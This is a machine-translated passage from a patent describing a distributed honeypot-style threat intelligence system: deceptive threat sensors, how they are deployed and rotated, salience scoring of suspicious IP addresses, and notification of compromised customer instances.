[0064] In some embodiments, specific characteristics of the threat data collector may be associated with a specific participant and / or originate from a specific network address. For example, if the same participant attempts to initiate inbound connections to a threat sensor multiple times, the threat data collector handling the inbound communications may maintain the same characteristics for that participant over a longer time period, or even throughout the entire lifecycle of the threat sensor. In other words, the same participant will receive the exact same banner and the exact same characteristics in its subsequent access attempts, even if these subsequent access attempts occur within other time periods where the threat data collector presents different banners and different characteristics in response to commands from different participants. For example, a first participant presented with one type of banner in its first access attempt may be presented with the same banner in subsequent access attempts (e.g., even after a specific time period has expired), while the threat data collector presents different or rotated banners to other participants for their first access attempts. In some embodiments, a first participant presented with one type of banner and specific characteristics of the system response command may receive the same banner and those characteristics in subsequent access attempts as this first participant received in its first access attempt. The first participant may receive the same banner and the same features in subsequent access attempts, even if different participants receive different banners and different features in their access attempts, wherein the timing of these access attempts is the same as, similar to or close to the timing of the first participant's subsequent access attempts.

[0065] In some embodiments, a threat data collector may use weighted characteristics to determine specific characteristics presented in response to incoming communications. For example, a threat data collector may be configured to use a specific banner response for a first specific percentage of time, while simultaneously configuring another banner response to be used for a second specific percentage of time (which may be the same as or a different percentage from the first specific percentage of time). As another example, each characteristic in the pool may be assigned a specific weight so that a specific characteristic is used based on its proportion of the total weight of the entire pool. Other methods may also be used to determine specific characteristics presented in response to incoming communications using weighted characteristics.

[0066] In some embodiments, changing the characteristics presented by the threat data collector in a threat sensor allows the threat sensor to attract and reach more actors. There may be many different types of scanners, malware, botnets, or other malicious actors scanning the system to identify targets, whether across the entire IP address range, within a specific portion of the IP address range, or randomly within a specific IP address range. If the threat data collector consistently responds with the same banner, it may only attract a small number of actors. For example, if the threat data collector responds to an HTTP request with only Tomcat, it may not attract other actors who are not interested in Tomcat. These other actors might be interested in other types of web servers.

[0067] Threat sensor deployment and management components can maximize the types of participants attracted by each threat data collector by diversifying the types of exposed information that actors can use to fine-tune their attacks. For example, if a malicious actor sees Tomcat version 1.8, then the actor will want to send a specific type of payload to exploit a specific type of attack vector, while if the actor sees version 2.1, then they will want to send a different payload. By exposing a variety of different responses, the entire threat sensor system has the opportunity to attract more different types of actors.

[0068] Threat data collectors may be bound to a specific port, or they may be used for multiple ports of a threat sensor, depending on the implementation. For example, a threat sensor may contain threat data collectors for different types of protocols, such as HTTP, Telnet, NTTP, and SSH. Each of these threat data collectors can typically be bound to one or more specific ports. However, in some implementations, different services may run on the same port. If the threat sensor deployment and management components bind only one type of threat data collector to a port that may be used for multiple types of communication, the threat sensor may miss some malicious activity that could be targeting other services that may be bound to the same port number. For example, both Telnet and SSH can be bound to port 23. Therefore, if the threat sensor only contains a threat data collector for Telnet on port 23, then actors targeting SSH on port 23 will no longer interact with the threat sensor because these actors expect SSH to run there.

[0069] In some embodiments, the threat sensor can perform a layer of network traffic analysis before traffic is passed to any threat data collector. The threat sensor can dynamically and / or heuristically determine which threat data collector is the intended target. In some embodiments, this can be based on the initial portion of the incoming payload. For example, in some embodiments, the threat sensor may be able to determine whether inbound communication is an SSH or HTTP request.

[0070] However, in some cases, the client side may not send anything to the threat sensor other than opening a connection. In these cases, the initial response must come from the threat sensor. Telnet, for example, can do this. In other cases, the client side might want to see something before proceeding. For example, the client side might want to see a banner or prompt before continuing. There are other instances where the client side might want to see something before proceeding in an IoT environment. For example, IoT devices could have a proprietary type of telnet that responds with different types of information before the client side sends anything other than completing the TCP connection.

[0071] Therefore, in some cases, the threat sensor may not be aware of the protocol used by the client-side participant when opening the connection. For example, a client might connect to port 23 without indicating the protocol or communication it intends to use, or providing any type of payload from the client side. In these cases, in some embodiments, the threat sensor can implement random selection of services by randomly selecting an appropriate threat data collector that might be bound to said port. In some embodiments, this selection of the threat data collector can also be based on weights. For example, the threat sensor might assign a weight of 3 to telnet and a weight of 1 to the proprietary digital video recorder (“DVR”) protocol, so that the threat sensor will respond with the telnet prompt 3 out of 4 times, and with the proprietary digital video recorder (“DVD”) protocol API prompt or protocol 1 out of 4 times. In some embodiments, the weight-based mode will be a timeout-based mode, meaning that it will only switch to the weight-based model after waiting for the client to send content for a certain period of time, and will switch back to the weight-based mode if the client does not send anything that can be used for heuristic analysis of the payload. In some embodiments, the threat sensor can fall back to the weight-based mechanism based on time or timeout.

[0072] In some embodiments, when determining which service or threat data collector will be exposed to inbound communications on a particular port, the threat sensor can monitor which service or services ultimately engage more frequently with participants in inbound communications. Then, in some embodiments, the threat sensor or threat sensor deployment and management components can adjust the services used to respond to inbound communications based on such monitoring. For example, the threat sensor can adjust weights used in a weighted approach to select services or threat data collectors to expose to or respond to inbound communications. The threat sensor may increase the weight of services or threat data collectors that engage more frequently in inbound communications. In some embodiments, the weights can be adjusted dynamically. Therefore, the threat sensor, or the threat sensor deployment and management components in some embodiments, can learn based on how much a participant engages with a service or threat data collector. For example, if the telnet protocol receives more contact than other protocols on port 200 today, then a higher weight can be assigned to the threat data collector implementing the telnet protocol when selecting services to expose to or respond to inbound communications on port 200. In some embodiments, this weighting can be performed across multiple threat sensors. Threat sensors may transmit weight adjustments to threat intelligence systems, such as the threat sensor deployment and management components of a threat intelligence system, which may then transmit this information to other threat sensors. In other embodiments, threat sensors may communicate with each other to coordinate weight adjustments for specific services or threat data collectors. Some or all threat sensors may also communicate with each other for a variety of other purposes.

[0073] In some embodiments, when a threat sensor binds a service to a port, such as assigning a specific threat data collector to a port, the threat sensor does not necessarily need to bind a single service or threat data collector to a port; instead, it may allow multiple threat data collectors to operate on a single port. The same may be true for encrypted information. For example, information received from a participant on the client side may be encrypted. Typically, in an HTTP server, the HTTPS version of expected TLS traffic is bound to port 443, which is where TLS negotiation occurs; if a client connects to port 80, then TLS negotiation will not occur.

[0074] However, in some embodiments, the threat sensor does not need to bind a specific service (such as HTTPS) to a specific port (such as 443), but can dynamically assign services to ports. In these embodiments, the threat sensor can examine the initial payload in the interaction request to see which protocol or communication method is being used. If the interaction request is for an encrypted protocol, the threat sensor can establish encryption before sending the communication to the appropriate threat data collector. For example, if the threat sensor recognizes an incoming TLS handshake request, it can complete the TLS handshake, switch to decrypted traffic, and then pass the traffic to a layer responsible for determining which threat data collector will receive the decrypted traffic. The layer can then determine which threat data collector is responsible for handling communication with the computational participant that initiated the inbound communication. In this way, in some embodiments, the threat sensor can process inbound communication on any port of one of the threat sensors for any available protocol, and the threat sensor can communicate using said protocol. For example, a participant can connect to any port of one of the threat sensors using HTTPS, and the threat sensor will respond using HTTP. As another example, a participant can connect to any port using SSH, and the threat sensor will respond using SSH. Therefore, in some embodiments, the same port can be responded to using many different protocols. In some embodiments, the protocol used by the threat sensor to respond may depend on the heuristics used by the threat sensor for analysis and decision-making.

[0075] In some embodiments, threat sensors may be associated with a dynamic lifetime. For example, each threat sensor may have a predetermined lifetime that is dynamically set. As an example, 80% of threat sensors may have a lifetime of 2 hours, 10% may have a lifetime of 24 hours, and 10% may have an operating time of one week. At the end of their lifetime, the threat sensors may be restarted, or the threat sensor deployment and management components may be re-provisioned and / or deployed and / or configured with new threat sensors (which may be different from or the same as the threat sensors that have reached the end of their lifetime).

[0076] The varying lifespans of different threat sensors will attract different types of actors. Some actors experience a gap between performing an initial scan and proceeding to the next stage of interaction. Further stages may involve actors revealing increasingly more information about themselves and their activities. For example, in the case of the shortest threat sensor runtime, say 2 hours, if an actor does not complete the entire attack within those 2 hours, the threat intelligence system will lose some information about that actor. Therefore, some threat sensors have longer lifespans to ensure that these types of actors are more likely to complete an attack, or at least make further progress. For instance, a malicious actor might first identify vulnerable targets through an initial scan, and then return to those vulnerable targets and launch an attack hours or even days later. The threat sensor is still present, residing at the same IP address and configured identically for the actor, so that the actor can continue to engage with it.

[0077] In some embodiments, when a new threat sensor is restarted, reproduced, deployed, and / or configured, a new network address (e.g., an IP address) can be assigned to the new threat sensor. For example, the threat sensor deployment and management components can deploy new threat sensors at different network addresses in multiple different geographic regions of the provider network and configure them according to a deployment plan. In some embodiments, the previous IP addresses of threat sensors that have reached the end of their lifespan can be released, and new IP addresses can be added for new threat sensors.

[0078] In some embodiments, assigning new and / or different IP addresses to new threat sensors can increase the virtual presence of the entire threat intelligence system across the IP address space. For example, instead of operating on a limited number of IP addresses, using different IP addresses for a threat sensor will significantly increase its coverage across the IP address space if a threat sensor operates using the same IP address throughout the week. Another advantage of assigning new and / or different IP addresses to new threat sensors is that it reduces the risk that an entity will recognize that the adopted IP address corresponds to a threat sensor. If an entity recognizes that the adopted IP address corresponds to a threat sensor, it may publish those IP addresses as belonging to the threat sensor, allowing malicious actors to actively avoid those IP addresses. The threat sensor may not receive as much traffic. Dynamically moving threat sensors within the IP address space provides a wider range, making them more difficult to blacklist. Blacklisting threat sensors becomes even more difficult if their IP addresses are constantly changing.

[0079] In some embodiments, malicious interactions involve not only inbound interactions, such as sending HTTP requests or opening SSH tunnels, but also outbound interactions. For example, after a malicious actor gains access to a device, they log in via SSH and then use the compromised device to connect to another location to download another malicious executable file. For instance, an infected device might initiate an outbound interaction to download Bitcoin mining software and then connect to another location, namely a mining pool, to initiate mining activities based on instructions from the mining pool.

[0080] In some embodiments, outbound interactions do not actually occur through threat sensors in a threat intelligence system and low- or medium-interaction threat data collectors. In some embodiments, to capture information, the threat data collector may process the payload and then initiate spoofed or simulated outbound interactions. If the threat data collector detects some form of URL, IP address, or domain name in the payload, it can begin probing outbound relationships in a controlled manner. For example, if a URL is embedded in the payload, the threat data collector may attempt to download a file located at that URL to examine its content type.

[0081] Outbound interactions facilitate the processing of threat intelligence, for example, through distributed threat sensor data aggregation and export components and / or distributed threat sensor analysis and related service components. This is because, when inbound interactions are involved, the IP address associated with the inbound communication may be an IP address associated with a very large network; for example, it may end up being just a proxy. Alternatively, in some embodiments, the IP address associated with the inbound communication may be an IP address somewhere with a volatile lifetime, so the IP address is only active for a day or two before disappearing. Therefore, for example, if such a network address is blacklisted, the threat intelligence system may only blacklist those who inherit the IP address after a malicious actor publishes it.

[0082] In some embodiments, outbound interactions are useful because they allow threat intelligence systems to determine whether an IP address is still being used for malicious activity and / or whether it is an address specifically designed for malicious activity. If a malicious file exists on an IP address accessed via an outbound interaction, the threat intelligence system can determine whether that malicious file still exists or has disappeared. For example, if a malicious actor reclaims an IP address for someone else, the same payload should not be retrieved from that IP address or from a previously observed corresponding URL.

[0083] In some embodiments, threat sensors and / or associated threat data collectors can continuously refresh outbound interactions. For example, a threat data collector can be configured hourly to acquire and / or connect outbound relationships to see if they still retain the information initially observed about them. In some embodiments, if outbound relationships still retain the information initially observed about them, then the threat data collector and / or threat sensor can refresh the information about the IP address in the system. In some cases, the IP address will be associated only with inbound interactions, while in others, the IP address will be associated only with outbound interactions because they are used only to host malware or command and control servers. However, in some cases, the same IP address used to scan inbound communications for threat sensors is also used to host malware, a reporting server, or a command and control server hosting malicious activity. In some embodiments, when both inbound and outbound interactions are observed for a single IP address, it is more likely that the IP address is malicious, even if the payload content is unknown. This is less likely to cause any unnecessary disruption if the threat intelligence system wants to take more intrusive actions, such as blocking traffic from the IP address.

[0084] Threat sensor deployment and management components

[0085] The threat sensor deployment and management component can extend deployment and / or configuration from a single threat sensor to multiple threat sensors. In some embodiments, the threat sensor deployment and management component can manage the configuration and deployment of threat sensors and each threat data collector associated with a threat sensor. In some embodiments, the threat sensor deployment and management component can also manage the threat sensors. In some embodiments, it can determine the type of threat data collector, the type of interaction implemented by each threat data collector, its functionality, and its configuration. For example, the threat sensor deployment and management component can determine whether a threat data collector is of medium or low interaction. In some embodiments, the threat sensor deployment and management component can also determine the number and type of threat data collectors that make up each threat sensor. In some embodiments, the threat sensor deployment and management component can determine the time frame for threat sensor operation, as well as the startup, restart, and distribution of threat sensors.

[0086] In some embodiments, the threat sensor deployment and management component performs these management functions by determining a deployment plan. In some embodiments, the threat sensor deployment and management component determines a deployment plan for multiple threat sensors, wherein each threat sensor specifies one or more threat data collectors of multiple different types. In some embodiments, at least some of the different types of threat data collectors may use different communication protocols or communication ports, or provide different responses to inbound communications. In some embodiments, the deployment plan of the threat sensor deployment and management component may also specify different lifetimes for the threat sensors. In some embodiments, the threat sensor deployment and management component may deploy the multiple threat sensors at multiple different network addresses in multiple different geographic regions and configure them according to the deployment plan. In some embodiments, the threat sensor deployment and management component may collect threat data from the deployed threat sensors and determine an adjusted deployment plan based on the collected threat data and the different lifetimes of the threat sensors, including one or more adjustments to the deployment plan. In some embodiments, the threat sensor deployment and management component may perform adjustments to the threat sensors in one or more geographic regions according to the adjusted deployment plan.

[0087] In some embodiments, the threat sensor deployment and management component can deploy threat sensors in a large number of regions, with each region potentially having a large number of threat sensors. For example, the threat sensor deployment and management component can deploy threat sensors in 19 regions, with each region potentially running at least several hundred threat sensors.

[0088] In some embodiments, to increase coverage, threat sensors need to be installed in more and more locations, such as more and more IP addresses, to increase the chances of being detected by scanners run by malicious actors. For example, some scanners operate sequentially to track all IP addresses in a sequential manner. Some scanners generate random IP addresses and hit those IP addresses. With scanners operating sequentially or randomly, the threat sensor deployment and management component can simply focus on deploying threat sensors at more IP addresses to increase coverage. However, there is another set of scanners that track specific regions. These scanners know that specific types of devices are more common in a certain region, so these scanners only hit IP addresses in said region, or even IP addresses in a specific country. Therefore, if the threat sensor deployment and management component wants to target a specific type of malicious attack, it may want to deploy more threat sensors in a specific region.

[0089] In some embodiments, the threat sensor deployment and management components may be distributed. Some functionality of the threat sensor deployment and management components may reside within the threat sensor code. Some functionality of the threat sensor deployment and management components may reside in the configuration of the provider network formation stack, such as in the autoscaling function. However, even when using autoscaling, some management functions must still create and run a provider network formation template containing all the correct configuration parameters. However, some or all of the functionality may reside in a separate threat sensor deployment and management component that can dynamically change the configuration of the threat sensor group and / or each threat data collector associated with the threat sensor.

[0090] In some embodiments, the threat sensor deployment and management components may employ dynamic mechanisms to attract more participants and / or more information. If a threat sensor is operational and receiving numerous inbound communications, such as an increasing number of participants detecting it, thus introducing more and more information, then the threat sensor and / or the threat sensor deployment and management components can extend the lifespan of that particular threat sensor. As another example, the lifespan of a threat sensor may be shortened if its health is compromised, such as by a denial-of-service attack. Threat sensors can be released into a pool before their initial associated lifespan ends. In some embodiments, this can protect the entire device group from these types of abuse.

[0091] In some embodiments, the threat sensor deployment and management components can also change the number of threat sensors in different areas based on the activity in those areas. In some embodiments, a fixed number of threat sensors may be present in an area. This fixed number may be the same in different areas or may vary from area to area. However, in other embodiments, the number of threat sensors in one or more areas can change dynamically. For example, in some areas, there is actually more activity, and these areas are collecting more intelligence. In these cases, the threat sensor deployment and management components can dynamically determine the size of the threat sensor groups in different areas to increase the presence of threat sensors in target areas with more attacks.

[0092] In some embodiments, the threat sensor deployment and management component may also utilize a number of different protection mechanisms to prevent the distortion of data received from a single actor. For example, the threat sensor deployment and management component may set a cap on the number of interactions captured by each threat sensor via the UDP protocol. This could be because, for UDP, the source IP address may be spoofed. For example, a malicious actor might determine that the deployed threat sensors are indeed designed to collect threat intelligence and might begin feeding the threat sensors various spoofed source IP addresses and less reliable information. However, not all actors are like this, and the threat sensors may not want to lose this information because, for many actors, they cannot provide spoofed source IP addresses due to limitations of their home networks, such as a specific range of ISP addresses. However, in some embodiments, for situations where spoofed IP addresses can be provided, the threat sensor deployment and management component and / or the deployed threat sensors may use self-regulating mechanisms to limit the UDP traffic of each threat sensor.

[0093] Even if the source IP address is not actually spoofable, threat sensor deployment and management components may still employ different protection mechanisms to avoid distorting data received from a single actor. For example, with the TCP protocol, the source IP address is not as spoofable as it is in the UDP world. However, even with TCP, threat sensor deployment and management components do not want a single source IP address to inject too much information into the overall threat intelligence system. Therefore, in some embodiments, threat sensor deployment and management components, as well as associated threat sensors, can impose a cap on the amount of information collected via any protocol that includes TCP. Regardless of the supported protocol, the amount of information collected from each source can be limited.

[0094] Distributed threat sensor data aggregation and data export component

[0095] In some embodiments, suspicious object interaction data collected by threat sensors can be moved through a processing pipeline to augment, aggregate, organize, and generate actionable threat intelligence outputs for use as a subset of factors in making security decisions. In some embodiments, interactions from the threat data collector can be collected as some form of sensor log and passed to a central system, such as a distributed threat sensor data aggregation and data export component, which can aggregate all data into a single format for easier processing. In some embodiments, many threat indicators, such as IP addresses, may be too volatile to trigger security alerts independently of other forms of security analysis. Therefore, in some embodiments, the threat intelligence system and / or the distributed threat sensor data aggregation and data export component may periodically export IP reputation data as one of its threat indicator outputs.

[0096] In some embodiments, the distributed threat sensor data aggregation and data export components may periodically, for example, every 10 minutes, export an updated version of their IP address reputation knowledge. In some embodiments, these exports may contain metadata about interactions with each suspicious IP address, such as the interacting sensor, protocol, port, direction, URL, and number of observation days. In some embodiments, the upper limit of fields with high cardinality may be set to the configured number of members.

[0097] Significance factor

[0098] The distributed threat sensor data aggregation and data export component and / or the distributed threat sensor analysis and correlation component can calculate a saliency factor after aggregating information from individual threat sensors. The saliency score can be a calculated score for each IP address, indicating its fidelity, to reduce false positives due to dynamic IP address reassignment or suspicious objects operating behind proxies within a large network. In some embodiments, each suspicious IP address may be associated with a saliency score.

[0099] More specifically, in some embodiments, to calculate the salience score of an IP address, the threat intelligence system may use factors such as historical time tracking and the freshness of suspicious object activity, the number of sensors and network protocol types with which the suspicious object interacts, and the observed connection directions to the suspicious object's network. Then, in some embodiments, the calculated value is adjusted based on configuration knowledge about known grayscale quality scanners and interaction content. For example, in some embodiments, an IP address may receive a high salience score if it has been frequently observed over the past three days, if it has consistently interacted with multiple threat sensors, if it has completed a TCP handshake (and therefore there is no source IP spoofing), and / or if it is referenced as a callback network point for actively distributing malware binaries. In some embodiments, the salience score for each suspicious IP address is calculated over a specific point in time and evolves based on its most recent activity pattern and a time decay factor.

[0100] In various implementations, several different factors can be used to calculate the significance factor. In some embodiments, one factor that can be used is the directionality of the interaction. In some embodiments, the confidence level may be lower for only inbound or outbound interactions, but higher for both inbound and outbound interactions. In some embodiments, if the traffic travels via TCP, the confidence level may be much higher, while if the traffic travels via UDP, the upper limit of the confidence level may be limited to a moderate range. For example, UDP is highly susceptible to spoofing, so we don't want to use IP addresses obtained from any UDP interactions to block any traffic.

[0101] In some embodiments, another factor that can be used to calculate the saliency factor is the recentity and frequency of the interaction. The recentity of actual observed interactions between an IP address and threat sensors and / or threat data collectors can be used to calculate the saliency score. The frequency of actual interactions between IP addresses can also be used. The number of threat sensors and / or the number of different regions with which the IP address's participant interacts can also be used to calculate the saliency score. These items can indicate the degree of activity of the IP address's participant in malicious activities. The type of service and / or port with which the interaction occurs can also be used to calculate the saliency score.

[0102] Another crucial consideration in calculating the saliency score is payload classification. Many scanners are not truly malicious. Some scanners merely collect information about the system at an IP address and (at least they themselves) do not use that information for malicious purposes. Payload classification can be used to determine the intent of each actor.

[0103] In some embodiments, a whitelist, or a list of IP addresses known to be unlikely to be malicious, may also be used to calculate the salience score. In these embodiments, a whitelist may be used when there is an identifier, such as an IP address, that should not be blacklisted or assigned a high salience factor; or when there is confidence that if a high salience score is calculated for this identifier, then the calculation or methodology of the threat intelligence system is certainly flawed. The whitelist can reduce the salience factor of these whitelisted identifiers based on the category to which the whitelist targets. In some embodiments, the salience score may be limited to a lower range than the salience scores of the whitelist.

[0104] In some embodiments, the calculation of the saliency score can be performed using or based on input from one or more threat intelligence system users. This can be achieved in some embodiments when the saliency score or its calculation is provided as a service to these users. For example, a service for which users can submit input that affects the calculated saliency score may have a feature, API, or GUI interface. In some embodiments, user input may include custom scoring definitions, formulas, or custom code to be executed, or a reference to a customer-provided functionality execution service within a provider network, customized to at least partially calculate the saliency score. For example, the service may provide a scoring builder tool in which users can specify the rules they wish to use when calculating the saliency score. In some embodiments, users may specify that the calculation is at least partially based on data available in one or more aggregator records. In some embodiments, user input may include weight levels for the various components of the given data. User input may involve the entire calculation of the saliency score or only a portion of it, with the remaining calculation left to the threat intelligence system itself, depending on the embodiment.

[0105] Additionally, it should be noted that while this description primarily focuses on IP addresses as identifiers of interaction sources, the use of IP addresses may be replaced by domain names, URLs, process or filenames and / or user agents in any part, component, or stage of a threat intelligence system. In some embodiments, a threat intelligence system may collect this information along with IP addresses and may use this information to identify the source of an interaction. In some embodiments, a threat intelligence system may also collect information about binaries that the system observes malicious actors attempting to land on the system's threat sensors. This information may also be aggregated, and its salience factor may be calculated. In some embodiments, this salience factor may be calculated using other information associated with the binary, such as how many sensors the binary will land on, through what protocol, or using what attack vector. In some embodiments, this may be used to track different types of botnets, as botnets can evolve into different types of attack vectors. Botnets can be observed to understand how they change to target different vulnerable devices.

[0106] Distributed threat sensor analysis and related components

[0107] Sometimes, in some embodiments, interactions with threat sensors and / or threat data collectors originate from known servers or actors, or servers that may be owned. For example, in some embodiments, there may be compute instances within the provider network that are independent of the threat intelligence system and interact with threat sensors and / or threat data collectors. In some embodiments, distributed threat sensor analysis and related components can determine that the interactions originate from one or more known instances owned or controlled by the provider network. In some embodiments, a mechanism can be used to prevent the abuse of these types of known or controlled instances, servers, or devices. Often, the clients of the provider network themselves may be victims of malicious actors, for example, malicious actors taking over their accounts or instances and beginning to spread malware that infects said instances, servers, or devices to other targets. Therefore, these compromised instances, servers, or devices of the provider network may also ultimately hit the threat sensors and threat data collectors of the threat intelligence system.

[0108] In some embodiments, when a provider network client is itself a victim of a malicious actor, the provider network can notify the client that its instance, server, or device is threatened. In some embodiments, the provider network can achieve this with minimal integration effort or by logging in from the provider network client, enabling the provider network to notify the client that its instance, server, or device is threatened. In some embodiments, the provider network can globally see who is using different exploits or attack vectors to communicate with threat sensors and threat data collectors.

[0109] In some embodiments, if the provider network knows how to contact the source of the interaction, such as a client of the provider network, then the provider network simply needs to inform them. In some embodiments, the client may not need to place a proxy on its device or provide any access or account to the provider network. In some embodiments, because the provider network maps instances to accounts within a precise timeframe, it can use this information to communicate with the client. Since the provider network may also have a history of deploying threat sensors or threat data collectors, this can also be provided to the client or third parties. If the client or third party themselves can view the caller, including the IP address of the threat sensor, then their client or third party can also use this information to identify compromised servers in their environment.

[0110] Examples of threat intelligence systems

[0111] Figure 1An example system environment of a threat intelligence system in a provider network according to some embodiments is shown. The threat intelligence system includes threat sensor deployment and management services, distributed threat sensor data aggregation and data export services, and distributed threat sensor analysis and related services. Multiple threat sensors are deployed in multiple geographic regions and communicate with multiple threat sensors in a client network, wherein one or more of the threat sensors interact with computing participants via the Internet.

[0112] In some embodiments, threat intelligence system 100 and any number of other possible services serve as part of service provider network 102, and each includes one or more software modules executed by one or more electronic devices located in one or more data centers and geographic locations. Clients and / or edge device owners 185, 187 using one or more electronic devices (which may be part of or separate from service provider network 102) can interact with various services of service provider network 102 via one or more intermediate networks, such as the Internet 190. In other instances, external or internal clients can programmatically interact with various services without user intervention.

[0113] Provider network 102 enables clients to use one or more of various types of compute-related resources, such as compute resources (e.g., executing virtual machine (VM) instances and / or containers, performing batch jobs, executing code without a provisioning server), data / storage resources (e.g., object storage, block-level storage, data archive storage, databases and database tables, etc.), network-related resources (e.g., configuring virtual networks containing groups of compute resources, content delivery networks (CDNs), domain name services (DNS)), application resources (e.g., databases, application build / deployment services), access policies or roles, identity policies or roles, machine images, routers, and other data processing resources, etc. These and other compute resources can be provided as services, such as hardware virtualization services that can execute compute instances, storage services that can store data objects, etc. Clients of provider network 102 (or "customers") can use one or more user accounts associated with a client account, but these terms may be used interchangeably to some extent depending on the context. Clients and / or edge device owners may interact with provider network 102 across one or more intermediate networks 190 (e.g., the Internet) via one or more interfaces, such as through application programming interface (API) calls, via a console implemented as a website or application, etc. The interface may be part of the provider network 102's control plane or serve as a front end to said control plane, which includes "back-end" services that support and enable services that can be provided more directly to clients.

[0114] To provide these and other computing resource services, provider network 102 typically relies on virtualization technology. For example, virtualization technology can be used to enable clients to control or use computing instances (e.g., VMs operating with a guest operating system (O / S) that may or may not operate on top of the underlying main O / S, containers that may or may not operate within a VM, or instances that can execute on "bare metal" hardware without an underlying supermanager), where one or more computing instances can be implemented using a single electronic device. Therefore, clients can directly use computing instances managed by the provider network (e.g., provided by a hardware virtualization service) to perform various computing tasks. Alternatively, clients can indirectly use computing instances by submitting code that will be executed by the provider network (e.g., via an on-demand code execution service), which in turn uses the computing instances to execute the code—typically without the client having any control or knowledge of the underlying computing instances involved.

[0115] As noted above, service provider networks enable developers and other users to more easily deploy, manage, and use various computing resources, including databases. For example, using database services, clients can alleviate many of the burdens associated with hardware provisioning, setup and configuration, replication, cluster scaling, and other tasks typically related to database management. Database services further enable clients to scale table throughput up or down with minimal downtime or performance degradation, and to monitor resource utilization, performance metrics, and other characteristics. Clients can easily deploy databases for use with various applications, such as online shopping carts, workflow engines, inventory tracking and fulfillment systems, etc.

[0116] In one of the depicted embodiments, a threat intelligence system 100 can be used to detect threats in various types of environments. In some embodiments, the threat intelligence system 100 is designed to collect, organize, and publish technical indicators of malware and / or botnets targeting provider networks, client networks, or IoT devices or networks. Therefore, in some embodiments, the threat intelligence system 100 is not limited to edge devices or IoT devices but can be used more broadly. In some embodiments, the system includes multiple threat sensors deployed at different network addresses and physically located in different geographic areas within provider network 102, such as geographic area 1 180 and geographic area N 182. These geographic areas may employ threat sensors, such as threat sensors 140a and 140b in geographic area 1 180 and threat sensors 140c and 140d in geographic area N. These threat sensors and their associated threat data collectors can detect interactions from sources.

[0117] In some embodiments, a malware threat intelligence system may include three separate components. These components are available as services within the context of a provider network. The three components are: a threat sensor deployment and management service 110, a distributed threat sensor data aggregation and export service 120, and a distributed threat sensor analysis and related services 130. Not all three components are required. A threat intelligence system may contain only one or two of these components. In addition to these components, the system may contain other components. The system may contain components that incorporate the functionality of the multiple components listed herein in different component configurations. For example, the system may combine certain functionalities of two of the components into one component. There are many different types of malware threat intelligence systems in various embodiments, and the specific component details listed herein should not be considered limiting.

[0118] In some embodiments, the threat intelligence system 100 may include a threat sensor deployment and management service 110. In some embodiments, the threat sensor deployment and management service 110 may include a threat sensor deployment plan generator 112 for determining deployment plans for the plurality of threat sensors, including deployment plans for associated threat data collectors of the threat sensors. Different types of threat data collectors may exist. Different threat sensors may include different numbers and types of threat data collectors. Threat data collectors may use different communication protocols or ports, or provide different types of responses to inbound communications. Different threat sensors may also have different lifespans.

[0119] The threat sensor deployment and management service 110 may further include a threat sensor deployment plan executor and a threat sensor deployer 114 for deploying threat sensors based on the deployment plan. Figure 1 In this context, the threat sensor deployment plan executor and threat sensor deployer 114 of the threat sensor deployment and management service 110 have deployed threat sensors with associated threat data collectors in multiple geographic regions. For example, threat sensors 140a and 140b have been deployed in geographic region N 180. Threat sensors 140c and 140d have been deployed in geographic region N 182. Threat sensor 140a contains threat data collectors 141 and 142. Threat sensor 140b contains threat data collectors 143 and 144. Threat sensor 140c contains threat data collectors 146 and 147. Threat sensor 140d contains threat data collectors 148 and 149.

[0120] The threat sensor deployment plan executor and threat sensor deployer 114 of the threat sensor deployment and management service 110 can also deploy 170 threat sensors in the client network. For example, threat sensor 160a has been deployed in the network 185 of client 1. Threat sensor 160a contains threat data collectors 162 and 164.

[0121] The threat sensor deployment and management service 110 may further include a threat data planning collector and a planning monitor 116 for collecting data from deployed threat sensors. In some embodiments, this data may be sent from a distributed threat sensor data aggregation and data export service in the form of monitoring data 157. In some embodiments, the threat data planning collector and planning monitor 116 may also collect this data directly from the threat sensors. The threat sensor deployment and management service 110 may further include a threat sensor deployment plan adjuster 118 for adjusting the deployment plan based on the collected data and the threat sensor lifetime. In some embodiments, a threat sensor deployment plan executor and a threat sensor deployer 114 may perform adjustments to the deployment plan.

[0122] In some embodiments, the threat intelligence system 100 may include a distributed threat sensor data aggregation and data export service 120. In some embodiments, the distributed threat sensor data aggregation and data export service 120 may include a threat sensor data aggregator 122 for receiving sensor data 155, such as sensor log streams, from the plurality of threat sensors. The threat sensor data aggregator 122 may also receive sensor data 175 from threat sensors 160a deployed in a client network, such as network 185 of client 1. In some embodiments, the sensor log stream may contain information about interactions with the threat sensors, including an identifier of the interaction source. The threat sensor data aggregator 122 of the distributed threat sensor data aggregation and data export service 120 may aggregate information from the sensor logs based on the source.

[0123] In some embodiments, the distributed threat sensor data collection and export service 120 may further include a saliency scoring component 124 for calculating a saliency score for a source. For example, the saliency score quantifies the likelihood that a source is involved in threat network communications. In some embodiments, the distributed threat sensor data aggregation and export service 120 may further include a threat sensor data and saliency score exporter 126 for providing the saliency score to other targets. For example, the threat sensor data and saliency score exporter 126 may export the saliency score and / or received or modified sensor log streams to one or more of the following: a data storage area, a database for more in-depth type analysis, distributed threat sensor analysis and related services and / or a user interface or dashboard.

[0124] In some embodiments, the threat intelligence system 100 may further include a distributed threat sensor analysis and related service 130. In some embodiments, the distributed threat sensor analysis and related service 130 obtains salience scores for different sources interacting with the plurality of threat sensors. In some embodiments, the distributed threat sensor analysis and related service 130 may include a malicious actor determination component 132 for determining which sources are malicious actors based on the salience scores. In some embodiments, the service may further include a known actor correlation component 134 for receiving identifiers of known actors, such as servers in a provider network, computing instances in a provider network, client devices in a client network, or IoT devices deployed in a remote network. In some embodiments of these embodiments, the known actor correlation component 134 of the distributed threat sensor analysis and related service 130 may correlate malicious actors with known actors to identify which known actors may be infected with malware.

[0125] The distributed threat sensor analysis and related services 130 may also include a notification module 136. In some embodiments, the notification module 136 may provide a target with an indication of one or more known devices infected by malware. In some embodiments, it may also trigger the execution of a customer-provided function. In some embodiments, it may also send a message to a remote network indicating the infected known device. Additionally or alternatively, in some embodiments, the notification module 136 may terminate the certificate, such as a security certificate, of the infected known device.

[0126] Figure 2 Further aspects of an example system of a threat sensor deployment and management component 202 according to some embodiments are shown, wherein the threat sensor deployment and management component 202 deploys and configures a plurality of threat sensors 204...214, each of which contains a plurality of different threat data collectors 206, 208, 210, 212, 216, 218, 220, wherein the threat data collectors receive inbound communications from a plurality of potential malicious actors 222, 224, 226.

